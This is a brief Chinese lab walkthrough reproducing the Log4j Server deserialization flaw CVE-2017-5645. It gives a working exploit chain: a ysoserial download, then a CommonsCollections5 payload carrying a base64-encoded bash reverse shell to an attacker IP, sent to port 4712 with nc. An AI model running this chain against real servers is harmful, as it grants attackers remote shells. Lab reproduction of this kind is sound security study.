Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

漏洞复现环境搭建请参考

http://t.csdnimg.cn/MxmId

漏洞版本

Apache Log4j 2.8.2之前的2.x版本

漏洞验证

(1)开放端口4712

漏洞利用

(1)ysoserial工具获取

python 复制代码
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

(2)base64加密反弹shell命令

(3)攻击机开启监听

(4)执行命令获取反弹shell

python 复制代码
#执行错误原因是因为Kali的jdk版本与ysoserial版本不符,正常执行完该条语句即可反弹shell
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEyOC84ODg4IDA+JjEn}|{base64,-d}|{bash,-i}" | nc 192.168.88.128 4712
相关推荐
傻啦嘿哟24 分钟前
Python正则表达式:用“模式密码“解锁复杂字符串
linux·数据库·mysql
大小曲奇(´ε` )1 小时前
使用安全继电器的急停电路设计
安全
浪裡遊2 小时前
Linux常用指令
linux·运维·服务器·chrome·功能测试
go_to_hacker2 小时前
安恒web安全春招实战
安全·web安全·网络安全·渗透测试
段ヤシ.3 小时前
银河麒麟(内核CentOS8)安装rbenv、ruby2.6.5和rails5.2.6
linux·centos·银河麒麟·rbenv·ruby2.6.5·rails 5.2.6
深夜情感老师5 小时前
centos离线安装ssh
linux·centos·ssh
网络安全工程师老王6 小时前
Java Agent 注入 WebSocket 篇
websocket·网络安全·信息安全·渗透测试
世界尽头与你6 小时前
【安全扫描器原理】网络扫描算法
网络·安全
AI拉呱_6 小时前
医院行业等保2.0案例
安全·web安全
2301_810154557 小时前
纯真社区IP库离线版发布更新
web安全